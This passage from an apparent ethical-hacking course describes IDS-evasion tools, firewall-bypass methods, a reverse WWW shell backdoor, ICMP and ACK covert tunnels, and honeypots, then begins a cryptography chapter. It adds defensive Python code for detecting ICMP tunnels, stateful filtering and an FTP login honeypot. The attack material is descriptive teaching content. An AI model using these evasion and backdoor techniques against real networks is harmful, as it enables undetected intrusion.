network intrusion detection systems.
2. Fragrouter allows attacks to avoid detection by network intrusion detection
systems.
3. For example, the Fragrouter could be used to obfuscate a phf attack against a
web server, a buffer overflow attack against a DNS server, or any number of
other attacks. fragrouter [ -i interface ] [ -p ] [ ATTACK] host
10.6.2 Hacking Tool: Tcpreplay
http://sourceforge.net/projects/tcpreplay/
1. Tcpreplay is a set of UNIX tools which allows the replaying of captured network
traffic.
2. It can be used to test a variety of network devices including routers, firewalls, and
NIDS. tcpreplay [ -i intf ] [ -l loop count ] [-r rate | -m multiplier ] file ...
10.6.3 Hacking Tool: SideStep.exe
http://www.robertgraham.com/tmp/sidestep.html
Sidestep is a hacking tool which evades network IDS in a completely different manner
compared to fragrouter.
Figure: 10.2
10.6.4 Hacking Tool: Anzen NIDSbench
http://www.anzen.com/research/nidsbench/
Contains "fragrouter" that forces all traffic to fragment, which demonstrates how easy it
is for hackers/crackers to do the same in order to evade intrusion detection.
This accepts incoming traffic then fragments it according to various rules (IP
fragmentation with various sizes and overlaps, TCP segmentation again with various
sizes and overlaps, TCP insertion in order to de-synchronize the connection, etc.)
10.6.5 Hacking Tool: ADMutate
http://www.ktwo.ca/security.html
1. ADMutate accepts a buffer overflow exploit as input and randomly creates a
functionally equivalent version which bypasses IDS.
2. Once a new attack is known, it usually takes the IDS vendors a number of hours
or days to develop a signature. But in the case of ADMutate, it has taken months
for signature-based IDS vendors to add a way to detect a polymorphic buffer
overflow generated by it.
Tools to inject strangely formatted packets on to the wire
1. Libnet (http://www.packetfactory.net/libnet)
2. Rootshell (http://www.rootshell.com)
3. IPsend (http://www.coombs.anu.edu.au/^avalon)
4. Sun Packet Shell (psh) Protocol Testing Tool (http://www.playground.sun.com/psh)
5. Net::RawIP (http://www.quake.skif.net/RawIP)
6. CyberCop Scanner's CASL (http://www.nai.com)
10.6.6 Hacking through firewalls
1. One of the easiest and most common ways for an attacker to slip by a firewall is
by installing some network software on an internal system that communicates
using a port address permitted by the firewall's configuration.
2. A popular port to use is port 53 TCP, normally used by DNS.
3. Many firewalls permit all traffic using port 53 by default, because it simplifies
firewall configuration and reduces support calls.
10.6.7 Bypassing Firewall using Httptunnel
1. http://www.nocrew.org/software/httptunnel.html
2. Httptunnel creates a bidirectional virtual data path tunneled in HTTP requests.
The requests can be sent via an HTTP proxy if desired.
Figure: 10.3
10.7 Placing Backdoors through Firewalls___________
10.7.1 The reverse www shell
1. This backdoor should work through any firewall that allows users to surf the
WWW. A program is run on the internal host, which spawns a child every day at a
special time.
2. To the firewall, this child looks like a user using a Netscape client to surf the
internet. In reality, this child executes a local shell and connects to the www
server operated by the hacker on the internet via a legitimate-looking HTTP request,
and sends its ready signal.
3. The legitimate-looking answer of the www server operated by the hacker is in
reality the commands the child will execute on its machine in the local shell.
10.7.2 Hiding Behind Covert Channel: Loki
http://www.phrack.com/phrack/51/P51-06
1. LOKI2 is an information-tunneling program. LOKI uses Internet Control Message
Protocol (ICMP) echo response packets to carry its payload. ICMP echo
response packets are normally received by the Ping program, and many firewalls
permit responses to pass.
2. It tunnels simple shell commands inside of ICMP_ECHO / ICMP_ECHOREPLY
and DNS name lookup query / reply traffic. To a network protocol analyzer, this
traffic looks like ordinary benign packets of the corresponding protocol. To the
correct listener (the LOKI2 daemon), however, the packets are recognized for
what they really are.
10.8 Hacking Tool:_______________________________
10.8.1 007 Shell
http://www.s0ftpj.org/en/docs.html
007Shell is a Covert Shell ICMP Tunneling program. It works similar to Loki.
It works by putting data streams in the ICMP message past the usual 4 bytes (8-bit type,
8-bit code and 16-bit checksum).
10.8.2 Hacking Tool: ICMP Shell
1. ICMP Shell (ISH) is a telnet-like protocol. It provides the capability of connecting
a remote host to open a shell using only ICMP for input and output.
2. The ISH server runs as a daemon on the server side. When the server receives a
request from the client, it will strip the header and look at the ID field, if it matches
the server's ID then it will pipe the data to "/bin/sh".
3. It will then read the results from the pipe and send them back to the client, where
the client then prints the data to stdout.
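All three ICMP tools just described (Loki in 10.7.2, 007Shell in 10.8.1 and ICMP Shell in 10.8.2) rely on the same property: echo packets whose data field carries something other than what a ping client puts there. The detector below is an added example written for this page (it is not from the course or from any of those tools) showing how a monitor can spot that from the defender's side. It parses the ICMP header, checks the RFC 1071 checksum, tracks echo requests so that replies nobody asked for stand out, and compares the payload against the fill patterns that common ping clients use. Those two patterns (the 32-byte "abcdefghijklmnopqrstuvwabcdefghi" string and a 56-byte timestamp-plus-incrementing-bytes layout) are assumptions about typical clients, and all packets and addresses are constructed.

```python
"""Heuristic detector for ICMP covert channels (added example)."""
import struct
from typing import Dict, List, Set, Tuple

ICMP_ECHO_REPLY, ICMP_ECHO = 0, 8
# Assumed fill patterns of common ping clients (not from the course text).
WINDOWS_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PAYLOAD_LEN = 56


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Construct an ICMP echo/echo-reply message (used only to build sample traffic)."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(raw: bytes) -> Dict:
    """Split an ICMP message into header fields and payload, verifying the checksum."""
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    recomputed = icmp_checksum(raw[:2] + b"\x00\x00" + raw[4:])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": raw[8:], "checksum_ok": recomputed == csum}


def looks_like_standard_ping(payload: bytes) -> bool:
    """True if the data field matches an assumed ping-client fill pattern."""
    if payload == WINDOWS_PAYLOAD:
        return True
    if len(payload) == LINUX_PAYLOAD_LEN:
        # 8- or 16-byte timestamp (varies) followed by bytes equal to their offset.
        return any(payload[ts:] == bytes(range(ts, LINUX_PAYLOAD_LEN)) for ts in (8, 16))
    return False


class IcmpTunnelDetector:
    def __init__(self) -> None:
        # Outstanding echo requests keyed by (requester, target, id, seq).
        self.outstanding: Set[Tuple[str, str, int, int]] = set()

    def observe(self, src: str, dst: str, raw: bytes) -> List[str]:
        """Return a list of findings for one observed ICMP message (empty if benign)."""
        pkt = parse_icmp(raw)
        findings: List[str] = []
        if not pkt["checksum_ok"]:
            findings.append("bad checksum")
        if pkt["type"] == ICMP_ECHO:
            self.outstanding.add((src, dst, pkt["id"], pkt["seq"]))
        elif pkt["type"] == ICMP_ECHO_REPLY:
            key = (dst, src, pkt["id"], pkt["seq"])
            if key in self.outstanding:
                self.outstanding.discard(key)
            else:
                findings.append("unsolicited echo reply")
        if pkt["type"] in (ICMP_ECHO, ICMP_ECHO_REPLY) and not looks_like_standard_ping(pkt["payload"]):
            findings.append("non-standard payload (%d bytes)" % len(pkt["payload"]))
        return findings


# Constructed traffic: two ordinary ping exchanges, then a reply nobody requested
# whose data field carries arbitrary bytes instead of a ping fill pattern.
LINUX_PAYLOAD = bytes(16) + bytes(range(16, LINUX_PAYLOAD_LEN))
SAMPLE_TRAFFIC = [
    ("10.0.0.5", "10.0.0.9", build_echo(ICMP_ECHO, 0x1234, 1, LINUX_PAYLOAD)),
    ("10.0.0.9", "10.0.0.5", build_echo(ICMP_ECHO_REPLY, 0x1234, 1, LINUX_PAYLOAD)),
    ("10.0.0.5", "10.0.0.9", build_echo(ICMP_ECHO, 0x0001, 7, WINDOWS_PAYLOAD)),
    ("10.0.0.9", "10.0.0.5", build_echo(ICMP_ECHO_REPLY, 0x0001, 7, WINDOWS_PAYLOAD)),
    ("203.0.113.7", "10.0.0.5", build_echo(ICMP_ECHO_REPLY, 0xBEEF, 0, b"covert-channel-data-0001")),
]


def run_sample() -> List[List[str]]:
    detector = IcmpTunnelDetector()
    return [detector.observe(s, d, raw) for s, d, raw in SAMPLE_TRAFFIC]


if __name__ == "__main__":
    for (s, d, _), findings in zip(SAMPLE_TRAFFIC, run_sample()):
        print(f"{s} -> {d}: {findings or 'ok'}")
```

The pattern check is deliberately conservative: an unfamiliar but legitimate ping client will produce a "non-standard payload" finding, so in practice it is used to prioritise inspection rather than to block on its own, while the unsolicited-reply and bad-checksum findings are strong signals. Where the firewall policy permits, the simpler mitigation the text mentions (blocking or rate-limiting ICMP echo at the perimeter) removes the channel altogether.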
10.8.3 ACK Tunneling
1. Trojans normally use ordinary TCP or UDP communication between their client
and server parts.
2. Any firewall between the attacker and the victim that blocks incoming traffic will
usually stop all Trojans from working. ICMP tunneling has existed for quite some
time now, but if you block ICMP in the firewall, you will be safe from that.
3. ACK Tunneling works through firewalls that do not apply their rule sets on TCP
ACK segments (ordinary packet filters belong to this class of firewalls).
10.8.4 Hacking Tool: AckCmd
http://ntsecurity.nu/papers/acktunneling
1. AckCmd is a client/server combination for Windows 2000 that lets you open a remote
command prompt on another system (running the server part of AckCmd).
2. It communicates using only TCP ACK segments. This way the client component
is able to directly contact the server component through a firewall in some cases.
Figure: 10.4
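The weakness that ACK tunneling (10.8.3) and AckCmd (10.8.4) rely on is a filter that treats "ACK bit set" as proof of an established connection. The Python below is an added example written for this page (not the course's or AckCmd's code) that puts the two filtering models side by side: a stateless rule that admits any inbound segment with ACK set, and a stateful filter that only admits inbound segments belonging to a connection it saw opened from the inside. The internal network 10.0.0.0/24, the segment records and the simplified connection states are constructed assumptions.

```python
"""Stateless 'established' filtering versus stateful connection tracking (added example)."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple

INSIDE = ipaddress.ip_network("10.0.0.0/24")  # constructed internal network


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    flags: FrozenSet[str]

    def outbound(self) -> bool:
        return ipaddress.ip_address(self.src) in INSIDE


def stateless_allow(seg: Segment) -> bool:
    """Classic packet filter: anything out; inbound only if it 'looks established' (ACK set)."""
    return seg.outbound() or "ACK" in seg.flags


class StatefulFilter:
    """Admits inbound segments only for connections initiated from the inside."""

    def __init__(self) -> None:
        # (inside host, inside port, outside host, outside port) -> state
        self.table: Dict[Tuple[str, int, str, int], str] = {}

    def allow(self, seg: Segment) -> bool:
        if seg.outbound():
            key = (seg.src, seg.sport, seg.dst, seg.dport)
            if "SYN" in seg.flags and "ACK" not in seg.flags:
                self.table[key] = "SYN_SENT"          # new connection attempt
            elif key in self.table and ({"FIN", "RST"} & seg.flags):
                del self.table[key]                   # simplified teardown
            return True
        key = (seg.dst, seg.dport, seg.src, seg.sport)
        state = self.table.get(key)
        if state is None:
            return False                              # no matching outbound SYN: drop
        if state == "SYN_SENT":
            if seg.flags == frozenset({"SYN", "ACK"}):
                self.table[key] = "ESTABLISHED"
                return True
            return False
        if {"FIN", "RST"} & seg.flags:
            del self.table[key]
        return True


F = frozenset
# Constructed traffic: a normal outbound web connection, then a bare inbound ACK
# aimed at an internal host with no handshake behind it (the ACK tunneling case).
SAMPLE: List[Segment] = [
    Segment("10.0.0.5", 40000, "198.51.100.20", 80, F({"SYN"})),
    Segment("198.51.100.20", 80, "10.0.0.5", 40000, F({"SYN", "ACK"})),
    Segment("10.0.0.5", 40000, "198.51.100.20", 80, F({"ACK"})),
    Segment("198.51.100.20", 80, "10.0.0.5", 40000, F({"ACK", "PSH"})),
    Segment("203.0.113.7", 1025, "10.0.0.5", 1054, F({"ACK"})),
]


def run_sample() -> List[Tuple[bool, bool]]:
    """Return (stateless verdict, stateful verdict) for each constructed segment."""
    stateful = StatefulFilter()
    return [(stateless_allow(seg), stateful.allow(seg)) for seg in SAMPLE]


if __name__ == "__main__":
    for seg, (sl, sf) in zip(SAMPLE, run_sample()):
        print(f"{seg.src}:{seg.sport} -> {seg.dst}:{seg.dport} {sorted(seg.flags)}"
              f"  stateless={'allow' if sl else 'drop'} stateful={'allow' if sf else 'drop'}")
```

Only the last segment separates the two filters: the stateless rule passes it because the ACK bit is set, the stateful one drops it because no internal host ever opened that connection. Production stateful firewalls also track sequence windows and time out idle entries, which the simplified table above omits.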
10.9 What is a Honeypot?_________________________
The first step to understanding honeypots is defining what a honeypot is. This can be
harder than it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not
solve a specific problem. Instead, they are a highly flexible tool that comes in many
shapes and sizes. They can do everything from detecting encrypted attacks in IPv6
networks to capturing the latest in on-line credit card fraud. It's this flexibility that gives
honeypots their true power. It is also this flexibility that can make them challenging to
define and understand. As such, I use the following definition of what a honeypot
is: a honeypot is an information system resource whose value lies in unauthorized or
illicit use of that resource.
This is a general definition covering all the different manifestations of honeypots. We will
be discussing in this paper different examples of honeypots and their value to security.
All will fall under the definition we use above; their value lies in the bad guys interacting
with them. Conceptually, almost all honeypots work the same. They are a resource that
has no authorized activity; they do not have any production value. Theoretically, a
honeypot should see no traffic because it has no legitimate activity. This means any
interaction with a honeypot is most likely unauthorized or malicious activity. Any
connection attempt to a honeypot is most likely a probe, attack, or compromise. While
this concept sounds very simple (and it is), it is this very simplicity that gives honeypots
their tremendous advantages (and disadvantages). I highlight these below.
10.9.1 Advantages of Honeypots
Honeypots are a tremendously simple concept, which gives them some very powerful
strengths.
Small data sets of high value: Honeypots collect small amounts of information.
Instead of logging one GB of data a day, they can log only one MB of data a day.
Instead of generating 10,000 alerts a day, they can generate only 10 alerts a day.
Remember, honeypots only capture bad activity; any interaction with a honeypot is most
likely unauthorized or malicious activity. As such, honeypots reduce 'noise' by collecting
only small data sets, but information of high value, as it is only the bad guys. This
means it's much easier (and cheaper) to analyze the data a honeypot collects and
derive value from it.
1. New tools and tactics: Honeypots are designed to capture anything thrown at
them, including tools or tactics never seen before.
2. Minimal resources: Honeypots require minimal resources; they only capture bad
activity. This means an old Pentium computer with 128MB of RAM can easily
handle an entire class B network sitting off an OC-12 network.
3. Encryption or IPv6: Unlike most security technologies (such as IDS systems)
honeypots work fine in encrypted or IPv6 environments. It does not matter what
the bad guys throw at a honeypot, the honeypot will detect and capture it.
4. Information: Honeypots can collect in-depth information that few, if any other
technologies can match.
5. Simplicity: Finally, honeypots are conceptually very simple. There are no fancy
algorithms to develop, state tables to maintain, or signatures to update. The
simpler a technology, the less likely there will be mistakes or misconfigurations.
10.9.2 Disadvantages Of Honeypots
Like any technology, honeypots also have their weaknesses. It is because of this that they
do not replace any current technology, but work with existing technologies.
1. Limited view: Honeypots can only track and capture activity that directly
interacts with them. Honeypots will not capture attacks against other systems,
unless the attacker or threat also interacts with the honeypots.
2. Risk: All security technologies have risk. Firewalls have the risk of being penetrated,
encryption has the risk of being broken, and IDS sensors have the risk of failing
to detect attacks. Honeypots are no different; they have risk also. Specifically,
honeypots have the risk of being taken over by the bad guy and being used to
harm other systems. This risk varies for different honeypots. Depending on the
type of honeypot, it can have no more risk than an IDS sensor, while some
honeypots have a great deal of risk. We identify which honeypots have what
levels of risk later in the paper.
10.9.3 Types Of Honeypots
Honeypots come in many shapes and sizes, making them difficult to get a grasp of. To
help us better understand honeypots and all the different types, we break them down
into two general categories, low-interaction and high-interaction honeypots.
These categories help us understand what type of honeypot you are dealing with, its
strengths, and weaknesses. Interaction defines the level of activity a honeypot allows an
attacker.
10.9.4 Low-Interaction Honeypots
Low-interaction honeypots have limited interaction; they normally work by emulating
services and operating systems. Attacker activity is limited to the level of emulation by
the honeypot. For example, an emulated FTP service listening on port 21 may just
emulate a FTP login, or it may support a variety of additional FTP commands. The
advantages of a low-interaction honeypot are their simplicity. These honeypots tend to
be easier to deploy and maintain, with minimal risk. Usually they involve installing
software, selecting the operating systems and services you want to emulate and
monitor, and letting the honeypot go from there. This plug and play approach makes
deploying them very easy for most organizations. Also, the emulated services mitigate
risk by containing the attacker's activity; the attacker never has access to an operating
system to attack or harm others. The main disadvantages of low-interaction honeypots
are that they log only limited information and are designed to capture known activity. The
emulated services can only do so much. Also, it's easier for an attacker to detect a
low-interaction honeypot; no matter how good the emulation is, a skilled attacker can
eventually detect their presence. Examples of low-interaction honeypots include
Specter, Honeyd, and KFSensor.
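The "emulated FTP service that may just emulate an FTP login" from the paragraph above, as an added example for this page (not code from the course, Honeyd, Specter or KFSensor): a pure state machine that speaks just enough of the FTP control protocol to collect login attempts, never grants access, and records every command. Keeping it free of sockets means the same object can be driven by a real listener on port 21 or, as here, by a constructed session. The banner text, the peer address and the session lines are constructed.

```python
"""Low-interaction FTP login honeypot as a state machine (added example)."""
from typing import List, Tuple

LogEntry = Tuple[str, str, str]  # (event, peer, detail)


class FtpLoginHoneypot:
    """Emulates only the login dialogue; every credential is rejected and logged."""

    BANNER = "220 FTP server ready."  # constructed; choose one that fits the decoy's role

    def __init__(self, peer: str) -> None:
        self.peer = peer
        self.pending_user = None
        self.log: List[LogEntry] = [("connect", peer, "")]

    def greeting(self) -> str:
        return self.BANNER

    def handle(self, line: str) -> str:
        """Process one control-channel line and return the reply to send."""
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        # Record the command name only; credentials are captured separately below.
        self.log.append(("command", self.peer, cmd))
        if cmd == "USER":
            self.pending_user = arg
            return f"331 Password required for {arg}."
        if cmd == "PASS":
            user = self.pending_user or ""
            self.pending_user = None
            self.log.append(("login_attempt", self.peer, f"{user}:{arg}"))
            return "530 Login incorrect."
        if cmd == "QUIT":
            self.log.append(("disconnect", self.peer, ""))
            return "221 Goodbye."
        if cmd in ("SYST", "FEAT", "HELP", "PWD", "LIST"):
            return "530 Please login with USER and PASS."
        return "500 Unknown command."

    def login_attempts(self) -> List[str]:
        return [detail for event, _, detail in self.log if event == "login_attempt"]


# Constructed session from a single peer: two credential guesses, one probe, then quit.
SESSION = ["USER anonymous", "PASS guest@example", "SYST", "USER admin", "PASS admin123", "QUIT"]


def run_sample() -> Tuple[List[str], List[str]]:
    """Drive the emulator with the constructed session; returns (replies, login attempts)."""
    hp = FtpLoginHoneypot("203.0.113.7")
    replies = [hp.handle(line) for line in SESSION]
    return replies, hp.login_attempts()


if __name__ == "__main__":
    replies, attempts = run_sample()
    for line, reply in zip(SESSION, replies):
        print(f"C: {line}\nS: {reply}")
    print("captured attempts:", attempts)
```

Because the emulator has no production purpose, every entry in its log is worth reading, which is the "small data sets of high value" point made in 10.9.1. The limited command set is also the weakness the text describes: a client that sends anything past the login dialogue gets the same canned refusal, which is how an attacker eventually tells the decoy from a real server.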
10.9.5 High-Interaction Honeypots
High-interaction honeypots are different; they are usually complex solutions as they
involve real operating systems and applications. Nothing is emulated; we give attackers
the real thing. If you want a Linux honeypot running an FTP server, you build a real
Linux system running a real FTP server. The advantages of such a solution are two
fold. First, you can capture extensive amounts of information. By giving attackers real
systems to interact with, you can learn the full extent of their behavior, everything from
new rootkits to international IRC sessions. The second advantage is that high-interaction
honeypots make no assumptions on how an attacker will behave. Instead, they provide
an open environment that captures all activity. This allows high-interaction solutions to
learn behavior we would not expect. An excellent example of this is how a Honeynet
captured encoded back door commands on a non-standard IP protocol (specifically IP
protocol 11, Network Voice Protocol). However, this also increases the risk of the
honeypot, as attackers can use this real operating system to attack non-honeypot
systems. As a result, additional technologies have to be implemented that prevent the
attacker from harming other non-honeypot systems. In general, high-interaction
honeypots can do everything low-interaction honeypots can do and much more.
However, they can be more complex to deploy and maintain. Examples of high-interaction
honeypots include Symantec Decoy Server and Honeynets. You can find a
complete listing of both low and high interaction honeypots at the Honeypot Solutions page.
To better understand both low and high interaction honeypots, let's look at two examples.
We will start with the low-interaction honeypot Honeyd.
Systems, as any data you retrieve from a honeypot is most likely related to the attacker.
The value honeypots provide here is quickly giving organizations the in-depth
information they need to rapidly and effectively respond to an incident. In general,
high-interaction honeypots make the best solution for response. To respond to an intruder,
you need in-depth knowledge of what they did, how they broke in, and the tools they
used. For that type of data you most likely need the capabilities of a high-interaction
honeypot.
10.9.6 Honeypot Software Vendors
1. Back Officer Friendly (http://www.nfr.com)
2. Bait N Switch Honeypot (http://violating.us)
3. BigEye (http://violating.us)
4. HoneyD(http://www.citi.umich.edu/u/provos/honeyd/)
5. KFSensor for Windows (http://www.keyfocus.net/kfsensor/)
6. LaBrea Tarpit (http://www.hackbusters.net)
7. ManTrap (http://www.symantec.com)
8. NetFacade (http://www.itsecure.bbn.com/NetFacade.htm)
9. Single-Honeypot (http://www.sourceforge.net/projects/singlehoneypot/)
10. Smoke Detector (http://palisadesys.com/products/smokedetector/)
11. Specter (http://www.specter.ch)
12. Tiny Honeypot (http://www.alpinista.org/thp/)
13. The Deception Toolkit (http://www.all.net/dtk/)
10.9.7 Honeypot-KFSensor
KFSensor is a Windows based honeypot Intrusion Detection System (IDS).
It acts as a honeypot to attract and detect hackers and worms by simulating vulnerable
system services and Trojans.
By acting as a decoy server it can divert attacks from critical systems and provide a
higher level of information than can be achieved by using firewalls and NIDS alone.
KFSensor is designed for use in a Windows based corporate environment and contains
many innovative and unique features such as remote management, a Snort compatible
signature engine and emulations of Windows networking protocols.
With its GUI based management console, extensive documentation and low
maintenance, KFSensor provides a cost effective way of improving an organization's
network security.
Signature attack identification
KFSensor's rule-based signature engine can identify known attack patterns, which greatly
helps in analyzing the nature of an event. Rules can be imported from external sources in
Snort format, giving access to a huge amount of security knowledge.
Detects Windows networking attacks
KFSensor contains the world's only Windows networking/ NetBIOS / SMB / CIFS
emulation honeypot. This unique feature enables it to detect the nature of attacks on file
shares and Windows administrative services, currently the most prevalent and
damaging on the Internet.
Firewalls can detect port scans, but not the nature of an attack. NIDS can identify
certain attacks but not without the risk of compromising security. Only KFSensor can
provide the maximum information on an attack, without risk of compromise.
Extendable architecture
The already comprehensive emulation and reporting features of KFSensor can be
further extended by writing your own scripts and database queries.
No false positives
Firewalls and network based IDS are often overwhelmed by the amount of network
traffic and often generate false alarms by misinterpreting legitimate network traffic.
KFSensor's honeypot model has no legitimate uses, so all connections to them are
suspect.
Low overheads
KFSensor lies dormant until attacked, consuming very little processor time or network
resources. Sensors can be installed on users’ machines without affecting their normal
use, eliminating the need for additional hardware.
Full coverage
All TCP, UDP and ICMP traffic is monitored for all ports.
Remote Administration
Protect different locations in the corporate network with multiple KFSensor installations
and manage the process from one location. KFSensor Enterprise Edition provides
remote configuration and real time concatenation of events from a single administrator
machine using top of the range encryption and authentication.
Simplicity
The concepts behind KFSensor are easy to understand. Its configuration and operation
is straightforward, requiring minimal training and maintenance.
Advanced server simulation
KFSensor emulates real servers, such as FTP, SMB, POP3, HTTP, Telnet, SMTP and
SOCKS to improve deception and gain more valuable information on a hacker's
motives.
Real time detection
Attacks are detected, analyzed and reported immediately allowing response to an attack
while still in progress.
Detects unknown threats
Unlike other products KFSensor does not rely on signatures of known attacks and can
therefore detect new or 0 day threats, such as new worms, viruses and elite hackers.
KFSensor is just as effective at detecting internal threats.
Security in-depth
KFSensor complements other types of security products, such as firewalls, anti-virus
and network based IDS systems, to provide an additional layer of protection.
Designed for a corporate environment
KFSensor's secure design and its ability to work both inside a LAN and in front of a
firewall make it suitable for organizations that demand the highest security
requirements.
Chapter-11
Cryptography with different
applications
Session Objectives:
At the end of this Session, you will be able to understand –
Introduction to Cryptography
What Is PKI?
RSA (Rivest Shamir Adleman)
Setting up RSA
MD5
SHA (Secure Hash Algorithm)
What Is SSH?
Hacking Tool: PGP Crack
Steganography
Tool: Mp3stego
Introduction____________________________________
Cryptography comes from the Greek words for ''secret writing.'' It has a long and
colorful history going back thousands of years. In this section we will just sketch some of
the highlights, as background information for what follows. For a complete history of
cryptography, Kahn's (1995) book is recommended reading. For a comprehensive
treatment of the current state-of-the-art in security and cryptographic algorithms,
protocols, and applications, see (Kaufman et al., 2002). For a more mathematical
approach, see (Stinson, 2002). For a less mathematical approach, see (Burnett and
Paine, 2001).
Professionals make a distinction between ciphers and codes. A cipher is a character-for-character or bit-for-bit transformation, without regard to the linguistic structure of the
message. In contrast, a code replaces one word with another word or symbol. Codes
are not used any more, although they have a glorious history. The most successful code
ever devised was used by the U.S. armed forces during World War II in the Pacific.
They simply had Navajo Indians talking to each other using specific Navajo words for
military terms, for example chay-dagahi-nail-tsaidi (literally: tortoise killer) for antitank
weapon. The Navajo language is highly tonal, exceedingly complex, and has no written
form. And not a single person in Japan knew anything about it.
In September 1945, the San Diego Union described the code by saying ''For three
years, wherever the Marines landed, the Japanese got an earful of strange gurgling
noises interspersed with other sounds resembling the call of a Tibetan monk and the
sound of a hot water bottle being emptied.'' The Japanese never broke the code and
many Navajo code talkers were awarded high military honors for extraordinary service
and bravery. The fact that the U.S. broke the Japanese code but the Japanese never
broke the Navajo code played a crucial role in the American victories in the Pacific.
11.1 Introduction to Cryptography_________________
Historically, four groups of people have used and contributed to the art of cryptography:
the military, the diplomatic corps, diarists, and lovers. Of these, the military has had the
most important role and has shaped the field over the centuries. Within military
organizations, the messages to be encrypted have traditionally been given to poorly-paid, low-level code clerks for encryption and transmission. The sheer volume of
messages prevented this work from being done by a few elite specialists.
Until the advent of computers, one of the main constraints on cryptography had been
the ability of the code clerk to perform the necessary transformations, often on a
battlefield with little equipment. An additional constraint has been the difficulty in
switching over quickly from one cryptographic method to another one, since this entails
retraining a large number of people. However, the danger of a code clerk being captured
by the enemy has made it essential to be able to change the cryptographic method
instantly if need be.
11.2 Types of Cryptography_______________________
1. Symmetric-key cryptography
2. Asymmetric-key (public-key) cryptography
11.2.1 Symmetric-key cryptography
Symmetric-key cryptography refers to encryption methods in which both the sender and
receiver share the same key (or, less commonly, in which their keys are different, but
related in an easily computable way).
The modern study of symmetric-key ciphers relates mainly to block ciphers and stream
ciphers and to their applications. A block cipher is, in a sense, a modern embodiment of
Alberti's polyalphabetic cipher: it takes as input a fixed-size block of plaintext and a key,
and outputs a block of ciphertext of the same size (AES, for example, works on 128-bit
blocks). Since messages are almost always longer than a single block, some method of
knitting together successive blocks is required. Several have been developed, some with
better security in one aspect or another than others. These are the modes of operation,
and they must be chosen carefully when a block cipher is used in a cryptosystem: ECB
mode, which encrypts each block independently, reveals whenever two plaintext blocks
are identical, while CBC mode XORs each plaintext block with the previous ciphertext
block (and a fresh random IV for the first one) so that repeated plaintext does not
produce repeated ciphertext.
11.2.2 Asymmetric-key cryptography
Asymmetric cryptography, also known as Public-key cryptography, is a form of
cryptography in which the key used to encrypt a message differs from the key used to
decrypt it. In public key cryptography, a user has a pair of cryptographic keys—a public
key and a private key. The private key is kept secret, while the public key may be widely
distributed. Incoming messages are encrypted with the recipient's public key and can
only be decrypted with the corresponding private key. The keys are related
mathematically, but the private key cannot be practically derived from the public key.
The two main branches of public key cryptography are:
Public key encryption — a message encrypted with a recipient's public key cannot be
decrypted by anyone except the recipient possessing the corresponding private key.
This is used to ensure confidentiality.
Digital signatures — a message signed with a sender's private key can be verified by
anyone who has access to the sender's public key, thereby proving that the sender
signed it and that the message has not been tampered with. This is used to ensure
authenticity.
Conversely, secret-key cryptography, also known as symmetric cryptography, uses a
single secret key for both encryption and decryption. To use symmetric cryptography for
communication, both the sender and receiver would have to know the key beforehand, or
it would have to be delivered over some separate secure channel. Public-key cryptography
removes that key-distribution problem. It is, however, far slower than a symmetric cipher,
so in practice (SSL/TLS, PGP, SSH) the two are combined: public-key operations are used
to authenticate the parties and to agree on a fresh symmetric session key, and that key
encrypts the actual data.
11.2.2.1 What is PKI?
PKI stands for Public Key Infrastructure: the certificate authorities, directories, protocols
and policies that bind public keys to the identities of their owners.
Public-key cryptography itself was published in 1976 by Whitfield Diffie and Martin
Hellman. A Certificate Authority (CA) runs on certificate server software and normally
publishes the certificates it issues, and its certificate revocation lists, to one or more
LDAP directories. The certificates are used by certificate-aware web servers and web
browsers, and can also be used by certificate-aware e-mail clients and other applications.
Few applications beyond the Web browser are certificate-aware, but notable exceptions
are emerging: Oracle8 enables certificate-based authentication for its broad client/server
base, and several products, including PeopleSoft, will be able to use certificates through
the GSS-API with Tuxedo. Most of us operate in heterogeneous environments with servers
and browsers from a variety of vendors, so understanding the key PKI standards helps in
mapping the integration of components into a certificate support fabric.
PKI Standards
The figure below maps the major standards that glue together the components of a PKI.
Most of them deal with the ways information about certificates is encoded and shuttled
around. These links are important when you start considering plug-and-play services for
your PKI, and may alert you to products that have a proprietary hook in a key part of the
architecture. There are other standards that define the make-up of the certificates
themselves (X.509), the negotiation of algorithms during various handshakes, etc. They
do not appear in the diagram.
PKI Policy
PKI policy exists within the general security policy environment of an organization.
Digital certificates need a well established environment of good general security policy
and procedure before they can be effective. The start of a PKI project is an excellent
time to review your organization's overall policy and procedure framework. Are your
policies up to date, comprehensive and well communicated? Is your security staff
knowledgeable about the security policies and in the habit of consulting and maintaining
their procedure documentation? Have you informed users of their security
responsibilities? A culture that understands the role of policy in security will have an
easier time implementing a PKI and digital certificates.
Figure: 11.1 Working of Encryption
Figure: 11.2 Digital Signature
11.2.2.2 What is a Digital Signature?
A digital signature scheme is a type of asymmetric cryptography used to simulate the
security properties of a handwritten signature on paper. Digital signature schemes
normally give two algorithms: one for signing, which involves the user's secret or private
key, and one for verifying signatures, which involves the user's public key. The output of
the signature process is called the "digital signature." In practice the message is first
hashed (see MD5 and SHA below) and the signature is computed over the digest, so that
messages of any length can be signed and the signature has a fixed size.
A signature provides authentication of a "message". Messages may be anything, from
electronic mail to a contract, or even a message sent in a more complicated
cryptographic protocol. Digital signatures are used to create public key infrastructure
(PKI) schemes in which a user's public key (whether for public-key encryption, digital
signatures, or any other purpose) is tied to a user by a digital identity certificate issued
by a certificate authority. PKI schemes attempt to unbreakably bind user information
(name, address, phone number, etc.) to a public key, so that public keys can be used as
a form of identification.
Digital signatures are often used to implement electronic signatures, a broader term that
refers to any electronic data that carries the intent of a signature, but not all electronic
signatures use digital signatures. In some countries, including the United States, and in
